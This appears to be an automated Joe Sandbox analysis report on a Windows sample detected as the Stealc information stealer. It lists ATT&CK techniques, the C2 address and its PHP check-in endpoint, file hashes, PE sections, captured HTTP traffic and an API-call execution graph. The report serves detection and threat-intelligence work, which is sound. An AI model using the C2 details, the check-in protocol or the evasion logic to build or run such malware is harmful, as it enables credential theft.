                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/0file.exe, 00000000.00000002.1747007538.0000000001088000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.php;file.exe, 00000000.00000002.1747007538.0000000001072000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37file.exe, 00000000.00000002.1747007538.0000000001088000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1747007538.000000000102E000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37/Gfile.exe, 00000000.00000002.1747007538.0000000001088000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phpSfile.exe, 00000000.00000002.1747007538.0000000001072000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        185.215.113.37
                        		unknownPortugal
                        		206894WHOLESALECONNECTIONSNLtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1541160
                        Start date and time:2024-10-24 14:17:04 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 3m 5s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:1
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 19
                        • Number of non-executed functions: 87
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated

                        Warnings

                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: file.exe

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        g4Cyr2T5jq.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousLummaC, StealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37/e2b1563c6670f193.php

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                        • 185.215.113.16
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        g4Cyr2T5jq.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                        • 185.215.113.16
                        msqT9atzYW.exeGet hashmaliciousAmadeyBrowse
                        • 185.215.113.43
                        file.exeGet hashmaliciousLummaC, StealcBrowse
                        • 185.215.113.16

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.949218692389576
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'836'032 bytes
                        MD5:efb3596cf052ae112e2b81b16870436e
                        SHA1:266b9c7ace3a1371ef5e87eb55f4e65ecb5e2d57
                        SHA256:73de19773f529e65c1935196f7eb61206dad5ad17783a4412543c4bf0325bdc6
                        SHA512:9fca9b4d81512d404556b8b1be39bdd5acd9ddb4af66c921d3074474bfceca28f6943d816c3ea36211eae67cb4eeccf99ca0713692b9b5a4f2d57fdb83f16a9b
                        SSDEEP:24576:y+saJ72bxAtYqLHfmrMgxkagLZSbr7AojH2ccN4MHEDK7SFma/o5FbJC6LgW:yiw+Ys7asKrbqRtHrbawtCQ
                        TLSH:FD8533EE8FD28D7BC9A490769283150CDFD2D8954D5CA1181E96E3362AE31E353C3A9C
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                        File Icon

                        Icon Hash:90cececece8e8eb0

                        Static PE Info

                        General

                        Entrypoint:0xa9a000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                        Entrypoint Preview

                        Instruction
                        jmp 00007F1674F7896Ah
                        psrad mm3, qword ptr [ebx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add cl, ch
                        add byte ptr [eax], ah
                        add byte ptr [eax], al
                        add byte ptr [0000000Ah], al
                        add byte ptr [eax], al
                        add byte ptr [eax], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax+eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        and al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        push es
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        or ecx, dword ptr [edx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Rich Headers

                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        0x10000x25b0000x22800603514736a3aa348022c374f60b487b3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        0x25e0000x2a00000x200af42d9509d719a85e15b99323cb5311aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        enilkfvu0x4fe0000x19b0000x19a200b36ff5d380d6b011ec6e75c0a6462283False0.9950591473636087data7.954611061577171IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        cjtkqast0x6990000x10000x4000bcbd54a184f9ec0804f6f510daeee32False0.6611328125data5.372094779376595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant0x69a0000x30000x220071291a579da5da9830d934a8ecee91e5False0.07192095588235294DOS executable (COM)0.788497548224364IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                        Imports

                        DLLImport
                        kernel32.dlllstrcpy

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-10-24T14:18:02.241179+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 24, 2024 14:18:01.030793905 CEST4973080192.168.2.4185.215.113.37
                        Oct 24, 2024 14:18:01.037185907 CEST8049730185.215.113.37192.168.2.4
                        Oct 24, 2024 14:18:01.037280083 CEST4973080192.168.2.4185.215.113.37
                        Oct 24, 2024 14:18:01.037431002 CEST4973080192.168.2.4185.215.113.37
                        Oct 24, 2024 14:18:01.044307947 CEST8049730185.215.113.37192.168.2.4
                        Oct 24, 2024 14:18:01.948930979 CEST8049730185.215.113.37192.168.2.4
                        Oct 24, 2024 14:18:01.949054956 CEST4973080192.168.2.4185.215.113.37
                        Oct 24, 2024 14:18:01.951911926 CEST4973080192.168.2.4185.215.113.37
                        Oct 24, 2024 14:18:01.957319975 CEST8049730185.215.113.37192.168.2.4
                        Oct 24, 2024 14:18:02.241003036 CEST8049730185.215.113.37192.168.2.4
                        Oct 24, 2024 14:18:02.241178989 CEST4973080192.168.2.4185.215.113.37
                        Oct 24, 2024 14:18:05.011349916 CEST4973080192.168.2.4185.215.113.37

                        HTTP Request Dependency Graph

                        • 185.215.113.37

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.449730185.215.113.37807264C:\Users\user\Desktop\file.exe
                        TimestampBytes transferredDirectionData
                        Oct 24, 2024 14:18:01.037431002 CEST89OUTGET / HTTP/1.1
                        Host: 185.215.113.37
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Oct 24, 2024 14:18:01.948930979 CEST203INHTTP/1.1 200 OK
                        Date: Thu, 24 Oct 2024 12:18:01 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Oct 24, 2024 14:18:01.951911926 CEST411OUTPOST /e2b1563c6670f193.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----EBAFBGIDHCBFHIECFCBG
                        Host: 185.215.113.37
                        Content-Length: 210
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 39 37 37 43 37 42 31 44 32 34 41 35 36 33 34 38 34 31 34 36 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 2d 2d 0d 0a
                        Data Ascii: ------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="hwid"6977C7B1D24A563484146------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="build"doma------EBAFBGIDHCBFHIECFCBG--
                        Oct 24, 2024 14:18:02.241003036 CEST210INHTTP/1.1 200 OK
                        Date: Thu, 24 Oct 2024 12:18:02 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
                        Data Ascii: YmxvY2s=


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        System Behavior

                        General

                        Target ID:0
                        Start time:08:17:57
                        Start date:24/10/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0x910000
                        File size:1'836'032 bytes
                        MD5 hash:EFB3596CF052AE112E2B81B16870436E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1704892194.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1747007538.000000000102E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:8.6%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:10.1%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:24
                          execution_graph 13429 9269f0 13474 912260 13429->13474 13453 926a64 13454 92a9b0 4 API calls 13453->13454 13455 926a6b 13454->13455 13456 92a9b0 4 API calls 13455->13456 13457 926a72 13456->13457 13458 92a9b0 4 API calls 13457->13458 13459 926a79 13458->13459 13460 92a9b0 4 API calls 13459->13460 13461 926a80 13460->13461 13626 92a8a0 13461->13626 13463 926b0c 13630 926920 GetSystemTime 13463->13630 13464 926a89 13464->13463 13466 926ac2 OpenEventA 13464->13466 13468 926af5 CloseHandle Sleep 13466->13468 13469 926ad9 13466->13469 13471 926b0a 13468->13471 13473 926ae1 CreateEventA 13469->13473 13471->13464 13473->13463 13827 9145c0 13474->13827 13476 912274 13477 9145c0 2 API calls 13476->13477 13478 91228d 13477->13478 13479 9145c0 2 API calls 13478->13479 13480 9122a6 13479->13480 13481 9145c0 2 API calls 13480->13481 13482 9122bf 13481->13482 13483 9145c0 2 API calls 13482->13483 13484 9122d8 13483->13484 13485 9145c0 2 API calls 13484->13485 13486 9122f1 13485->13486 13487 9145c0 2 API calls 13486->13487 13488 91230a 13487->13488 13489 9145c0 2 API calls 13488->13489 13490 912323 13489->13490 13491 9145c0 2 API calls 13490->13491 13492 91233c 13491->13492 13493 9145c0 2 API calls 13492->13493 13494 912355 13493->13494 13495 9145c0 2 API calls 13494->13495 13496 91236e 13495->13496 13497 9145c0 2 API calls 13496->13497 13498 912387 13497->13498 13499 9145c0 2 API calls 13498->13499 13500 9123a0 13499->13500 13501 9145c0 2 API calls 13500->13501 13502 9123b9 13501->13502 13503 9145c0 2 API calls 13502->13503 13504 9123d2 13503->13504 13505 9145c0 2 API calls 13504->13505 13506 9123eb 13505->13506 13507 9145c0 2 API calls 13506->13507 13508 912404 13507->13508 13509 9145c0 2 API calls 13508->13509 13510 91241d 13509->13510 13511 9145c0 2 API calls 13510->13511 13512 912436 13511->13512 13513 9145c0 2 API calls 13512->13513 13514 91244f 13513->13514 13515 9145c0 2 API calls 13514->13515 13516 912468 13515->13516 13517 9145c0 2 API calls 13516->13517 13518 912481 13517->13518 13519 9145c0 2 API calls 13518->13519 13520 91249a 13519->13520 13521 9145c0 2 API calls 13520->13521 13522 9124b3 13521->13522 13523 9145c0 2 API calls 13522->13523 13524 9124cc 13523->13524 13525 9145c0 2 API calls 13524->13525 13526 9124e5 13525->13526 13527 9145c0 2 API calls 13526->13527 13528 9124fe 13527->13528 13529 9145c0 2 API calls 13528->13529 13530 912517 13529->13530 13531 9145c0 2 API calls 13530->13531 13532 912530 13531->13532 13533 9145c0 2 API calls 13532->13533 13534 912549 13533->13534 13535 9145c0 2 API calls 13534->13535 13536 912562 13535->13536 13537 9145c0 2 API calls 13536->13537 13538 91257b 13537->13538 13539 9145c0 2 API calls 13538->13539 13540 912594 13539->13540 13541 9145c0 2 API calls 13540->13541 13542 9125ad 13541->13542 13543 9145c0 2 API calls 13542->13543 13544 9125c6 13543->13544 13545 9145c0 2 API calls 13544->13545 13546 9125df 13545->13546 13547 9145c0 2 API calls 13546->13547 13548 9125f8 13547->13548 13549 9145c0 2 API calls 13548->13549 13550 912611 13549->13550 13551 9145c0 2 API calls 13550->13551 13552 91262a 13551->13552 13553 9145c0 2 API calls 13552->13553 13554 912643 13553->13554 13555 9145c0 2 API calls 13554->13555 13556 91265c 13555->13556 13557 9145c0 2 API calls 13556->13557 13558 912675 13557->13558 13559 9145c0 2 API calls 13558->13559 13560 91268e 13559->13560 13561 929860 13560->13561 13832 929750 GetPEB 13561->13832 13563 929868 13564 929a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13563->13564 13565 92987a 13563->13565 13566 929af4 GetProcAddress 13564->13566 13567 929b0d 13564->13567 13570 92988c 21 API calls 13565->13570 13566->13567 13568 929b46 13567->13568 13569 929b16 GetProcAddress GetProcAddress 13567->13569 13571 929b68 13568->13571 13572 929b4f GetProcAddress 13568->13572 13569->13568 13570->13564 13573 929b71 GetProcAddress 13571->13573 13574 929b89 13571->13574 13572->13571 13573->13574 13575 929b92 GetProcAddress GetProcAddress 13574->13575 13576 926a00 13574->13576 13575->13576 13577 92a740 13576->13577 13578 92a750 13577->13578 13579 926a0d 13578->13579 13580 92a77e lstrcpy 13578->13580 13581 9111d0 13579->13581 13580->13579 13582 9111e8 13581->13582 13583 911217 13582->13583 13584 91120f ExitProcess 13582->13584 13585 911160 GetSystemInfo 13583->13585 13586 911184 13585->13586 13587 91117c ExitProcess 13585->13587 13588 911110 GetCurrentProcess VirtualAllocExNuma 13586->13588 13589 911141 ExitProcess 13588->13589 13590 911149 13588->13590 13833 9110a0 VirtualAlloc 13590->13833 13593 911220 13837 9289b0 13593->13837 13596 911249 13597 91129a 13596->13597 13598 911292 ExitProcess 13596->13598 13599 926770 GetUserDefaultLangID 13597->13599 13600 926792 13599->13600 13601 9267d3 13599->13601 13600->13601 13602 9267a3 ExitProcess 13600->13602 13603 9267c1 ExitProcess 13600->13603 13604 9267b7 ExitProcess 13600->13604 13605 9267cb ExitProcess 13600->13605 13606 9267ad ExitProcess 13600->13606 13607 911190 13601->13607 13605->13601 13608 9278e0 3 API calls 13607->13608 13609 91119e 13608->13609 13610 9111cc 13609->13610 13611 927850 3 API calls 13609->13611 13614 927850 GetProcessHeap RtlAllocateHeap GetUserNameA 13610->13614 13612 9111b7 13611->13612 13612->13610 13613 9111c4 ExitProcess 13612->13613 13615 926a30 13614->13615 13616 9278e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13615->13616 13617 926a43 13616->13617 13618 92a9b0 13617->13618 13839 92a710 13618->13839 13620 92a9c1 lstrlen 13622 92a9e0 13620->13622 13621 92aa18 13840 92a7a0 13621->13840 13622->13621 13624 92a9fa lstrcpy lstrcat 13622->13624 13624->13621 13625 92aa24 13625->13453 13627 92a8bb 13626->13627 13628 92a90b 13627->13628 13629 92a8f9 lstrcpy 13627->13629 13628->13464 13629->13628 13844 926820 13630->13844 13632 92698e 13633 926998 sscanf 13632->13633 13873 92a800 13633->13873 13635 9269aa SystemTimeToFileTime SystemTimeToFileTime 13636 9269e0 13635->13636 13637 9269ce 13635->13637 13639 925b10 13636->13639 13637->13636 13638 9269d8 ExitProcess 13637->13638 13640 925b1d 13639->13640 13641 92a740 lstrcpy 13640->13641 13642 925b2e 13641->13642 13875 92a820 lstrlen 13642->13875 13645 92a820 2 API calls 13646 925b64 13645->13646 13647 92a820 2 API calls 13646->13647 13648 925b74 13647->13648 13879 926430 13648->13879 13651 92a820 2 API calls 13652 925b93 13651->13652 13653 92a820 2 API calls 13652->13653 13654 925ba0 13653->13654 13655 92a820 2 API calls 13654->13655 13656 925bad 13655->13656 13657 92a820 2 API calls 13656->13657 13658 925bf9 13657->13658 13888 9126a0 13658->13888 13666 925cc3 13667 926430 lstrcpy 13666->13667 13668 925cd5 13667->13668 13669 92a7a0 lstrcpy 13668->13669 13670 925cf2 13669->13670 13671 92a9b0 4 API calls 13670->13671 13672 925d0a 13671->13672 13673 92a8a0 lstrcpy 13672->13673 13674 925d16 13673->13674 13675 92a9b0 4 API calls 13674->13675 13676 925d3a 13675->13676 13677 92a8a0 lstrcpy 13676->13677 13678 925d46 13677->13678 13679 92a9b0 4 API calls 13678->13679 13680 925d6a 13679->13680 13681 92a8a0 lstrcpy 13680->13681 13682 925d76 13681->13682 13683 92a740 lstrcpy 13682->13683 13684 925d9e 13683->13684 14614 927500 GetWindowsDirectoryA 13684->14614 13687 92a7a0 lstrcpy 13688 925db8 13687->13688 14624 914880 13688->14624 13690 925dbe 14769 9217a0 13690->14769 13692 925dc6 13693 92a740 lstrcpy 13692->13693 13694 925de9 13693->13694 13695 911590 lstrcpy 13694->13695 13696 925dfd 13695->13696 14785 915960 13696->14785 13698 925e03 14929 921050 13698->14929 13700 925e0e 13701 92a740 lstrcpy 13700->13701 13702 925e32 13701->13702 13703 911590 lstrcpy 13702->13703 13704 925e46 13703->13704 13705 915960 34 API calls 13704->13705 13706 925e4c 13705->13706 14933 920d90 13706->14933 13708 925e57 13709 92a740 lstrcpy 13708->13709 13710 925e79 13709->13710 13711 911590 lstrcpy 13710->13711 13712 925e8d 13711->13712 13713 915960 34 API calls 13712->13713 13714 925e93 13713->13714 14940 920f40 13714->14940 13716 925e9e 13717 911590 lstrcpy 13716->13717 13718 925eb5 13717->13718 14945 921a10 13718->14945 13720 925eba 13721 92a740 lstrcpy 13720->13721 13722 925ed6 13721->13722 15289 914fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13722->15289 13724 925edb 13725 911590 lstrcpy 13724->13725 13726 925f5b 13725->13726 15296 920740 13726->15296 13728 925f60 13729 92a740 lstrcpy 13728->13729 13730 